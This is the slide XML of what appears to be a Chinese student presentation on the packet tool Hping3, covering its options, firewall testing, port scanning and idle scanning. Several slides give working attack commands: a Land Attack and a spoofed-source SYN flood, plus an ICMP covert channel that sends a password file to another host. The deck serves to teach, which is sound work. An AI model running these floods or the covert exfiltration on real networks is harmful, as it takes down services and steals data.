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6F2E-D607-4204-93E2-5F54E557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B2A29-827D-4ABD-946E-19A41DA3E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FDEFB-9A1A-41D6-9BC0-638404C1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4E19C-7FEA-4C3D-990C-DFFD715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D1BE8-8ABA-4A45-946A-ECD1CEBE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0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C245-2DF9-41C3-95F4-5435D78D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EA70A-63ED-404F-9289-C51E7851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DA650-1FDC-42B2-B2A0-6A9DF299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DD180-175A-4D3B-B7C3-73004980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CBA2C-0AD2-4FB9-9D0E-81D0480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2C43D-6B15-413C-89DA-C0F507F5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B8D17-6176-4FA6-88AE-D6ECAA00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2007A-97C8-4520-B4C0-7D3EF09A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F42E3-9B23-44A2-A99D-B8F118F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ACF8-BCF2-4656-81F9-F7148A97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D22B-555C-49CA-A8A8-5416119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95D92-08B9-4827-BB1F-42A479F8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36D46-A6A3-40AB-A09D-06366C05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AF6A2-4168-456D-BC0E-11127581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EEDD0-53C6-413D-859F-28DA6AD0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F4360-1A43-4D6C-AAD5-51F93B90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CC032-8407-4F69-9E22-01809937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7D530-7864-4FDF-AC74-539E53A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B7CC7-682C-4663-ADE2-1369F15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AEDD1-C7C8-4FC7-B661-BBDD77B2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6135-F837-475F-8FF5-B820414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87C28-2D5F-4B95-A7A3-284A4C2C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2B63C-39B9-4D25-8858-AA9C4CFD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53B50-6280-4EC1-9B5A-D118EA3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5163C-44BC-4CED-8AC6-A36EAD21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5C1B6-1ECC-40D4-AE3D-CA184FA1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64AD-59F7-4FDC-94E8-1ED90CC6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78A5C-0681-488F-BD2B-87E80969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7FBC5-64DB-42C8-B693-77BF1ED73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08FD4-867E-4C78-AD5C-C9B2368D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36EC35-73E7-442D-BC20-D28E79B6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FABE7-AE4C-4622-9471-A40C84E3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4A03B-B8EA-4974-AF19-3332CE05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4FFB3-2BD0-4573-9510-1EACB27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C7DC2-7FEA-4172-A94D-2504FE0F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6A28-B5D4-482B-8C5F-8EC8B236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2FFF1-8851-49AD-9060-7853ABAD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BB970-9DB0-4D00-9898-F56E4A1B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309347-F29F-41DA-8052-4ACD049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18638C-C7FD-47C3-BADD-14C132A3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4A1BB-3654-44DF-A992-2E2C96F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535A-74B8-492B-9517-2BF879F0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5E552-EA96-40D1-84AF-0E2B644E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D87EC-78A6-45B0-969C-9E85959B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9062A-5A2B-4577-BC97-D68284F1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E4ED7-2298-4F00-ADCB-86822CA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27112-3B04-493C-A58C-E7E1CD83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4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8FC78-5124-4077-B623-D083556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73D71-7846-4CF2-8991-D9E19764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A0A30-FBAE-4DB6-98A1-7CF65222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8A639-3A9F-4B96-AD15-2ACD219B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E6E4A-EF55-4400-9E6A-2FDB4E22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D2410-9E73-4BD7-8271-8DF51E2E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9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2AB48-9F04-46D7-BF7A-688F2332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DDEA0-9197-4BD7-8B6C-D46C57E6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6CF86-1042-4BCA-B268-D5CBA10F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D16D-BC7E-4612-9C62-CEFE224F554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21E20-D51A-4970-A7BB-D45EFF1BE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2AED5-B57A-41F5-BB54-554D292F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F43B-094D-4ED6-93E9-03FDBD30F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D9C21-8558-42B0-946D-BB98E6DEC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地址欺骗扫描工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hping3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B2AD7A-0E74-41DF-B8DA-B7A1C1DE7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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B19030824</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>茹兴奥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166631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9254C-010D-438E-A38A-34E6EDDA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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用设置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92E55-61DA-4234-B07D-17D0C953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-d  --data       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> size    (default is 0)    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送数据包大小，缺省是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-E  --file       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件数据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-e  --sign       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>添加“签名”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-j  --dump       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转储为十六进制数据包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-J  --print      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转储为可打印字符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-B  --safe       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>启用“安全”协议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-u  --end        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>告诉你什么时候</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>达到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EOF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>并防止倒回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-T  --traceroute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等同使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--bind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  --tr-stop        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模式下收到第一个不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时退出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--tr-keep-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ttl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保持源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>固定，仅用于监视一跳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--tr-no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rtt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不要在跟踪路由模式下计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RTT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包描述（新增功能，不稳定）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARS packet description (new, unstable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>apd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-send       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>APD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>描述数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>docs / APD.txt)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56723-F094-4C31-B391-9A9AFC05E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Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>典型功能应用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7DA210-5C8A-4E1B-A252-417E0702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0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930FC-549F-4317-8167-8F44F7D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DFA89-D47F-45FD-BE1C-9299E5C3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Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指定各种数据包字段，依次对防火墙进行详细测试。请参考：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://0daysecurity.com/articles/hping3_examples.html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试防火墙对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的反应、是否支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、是否开放某个端口、对防火墙进行拒绝服务攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DoS attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）。例如，以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>LandAttack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式测试目标防火墙（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Land Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10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67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FA7A-66C8-4015-B547-E6A61DF7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1492-97C1-4E8D-9B9E-2BF2C8EF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Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可以对目标端口进行扫描。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>各个标志位、长度等信息。以下示例可用于探测目标机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口是否开放：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3 -I eth0 -S 192.168.10.1 -p 80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-I eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指定使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的标志位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-p 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指定探测的目的端口。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持非常丰富的端口探测方式，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拥有的扫描方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>几乎都支持（除开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>仅发送与接收包，不会维护连接，所以不支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方式探测）。而且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>能够对发送的探测进行更加精细的控制，方便用户微调探测结果。当然，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的端口扫描性能及综合处理能力，无法与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相比。一般使用它仅对少量主机的少量端口进行扫描。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86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E7EFA-0153-43A0-8466-A6ABEB3D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8D714-70D9-49F4-B577-1DD3DE5C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Idle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Idle Scanning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）是一种匿名扫描远程主机的方式，该方式也是有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的作者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Salvatore Sanfilippo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发明的，目前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Idle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>扫描在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中也有实现。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该扫描原理是：寻找一台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机（该主机没有任何的网络流量，并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IPID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是逐个增长的），攻击端主机先向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机发送探测包，从回复包中获取其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IPID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。冒充</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址向远程主机的端口发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包（此处假设为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包），此时如果远程主机的目的端口开放，那么会回复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN/ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，此时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN/ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后回复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包。然后攻击端主机再向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>idle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机发送探测包，获取其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IPID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。那么对比两次的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IPID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。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8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32624-39AC-409C-AF8D-5F3477C9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拒绝服务攻击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C66E4-5C22-4F67-A8F3-AFBB9A6D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Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以很方便构建拒绝服务攻击。比如对目标机发起大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接，伪造源地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.10.99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>微秒的间隔发送各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> u1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其他攻击如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>teardrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>land attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等也很容易构建出来。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92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9971-303E-43E2-AB51-C3BF20CC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3097B-C1D3-4C16-87D1-52A9E9F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Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/UDP/ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等包来进行文件传输。相当于借助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/UDP/ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包建立隐秘隧道通讯。实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。在接收端开启服务：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3 192.168.1.159--listen signature --safe --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包中的签名，根据签名解析出文件内容。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在发送端使用签名打包的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包发送文件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hping3 192.168.1.108--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ?d 100 --sign signature --file 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密码文件通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包传给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>192.168.10.44</a:t>
            </a:r>
            <a:r>
